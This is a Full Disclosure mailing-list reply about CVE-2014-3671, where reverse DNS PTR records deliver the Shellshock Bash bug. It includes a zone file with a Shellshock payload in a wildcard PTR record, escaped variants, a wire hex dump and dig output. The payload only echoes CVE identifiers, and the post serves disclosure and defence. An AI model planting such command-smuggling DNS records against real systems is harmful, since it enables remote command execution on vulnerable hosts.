[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)
- To: Florian Weimer <fw@xxxxxxxxxxxxx>
- Subject: Re: [FD] CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)
- From: Dirk-Willem van Gulik <dirkx@xxxxxxxxxxxxxx>
- Date: Tue, 14 Oct 2014 15:45:34 +0100
On 14 Oct 2014, at 13:04, Florian Weimer <fw@xxxxxxxxxxxxx> wrote:
>> A simple zone file; such as:
>>
>> $TTL 10;
>> $ORIGIN in-addr.arpa.
>> @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org (
>> 666 ; serial
>> 360 180 3600 1800 ; very short lifespan.
>> )
>> IN NS 127.0.0.1
>> * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS"
>
> I'm surprised DNS servers grok this, should be
>
> * IN PTR
> \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
>
> Or something similar.
The production versions of NSD accepts this fine ‘as is’ (FreeBSD-9.3); bind
requires a bit of careful escaping.
On te wire one then sees the raw ‘binary’ — which can indeed be very raw:
000001d0 XX XX XX XX 31 28 29 20 7b 20 3a 3b 7d 3b 20 65 () { :;}; e|
000001e0 63 68 6f 20 63 76 65 2d 32 30 31 34 2d 36 32 37 |cho cve-2014-627|
000001f0 31 2c 20 63 76 65 2d 32 30 31 34 30 37 31 36 39 |1, cve-201407169|
00000200 2c 20 72 64 6e 73 c0 14 c0 XX XX XX XX XX XX XX |, rdns
And once you push this through DIG - one sees:
4.3.2.1.in-addr.arpa. 10 IN PTR
\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.
depending on your escaping (which nornal unix libc/resolve does). And then we
found at least one setenv() which would *de-escape* above nicely - getting the
octal and decimal right.
Dw.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/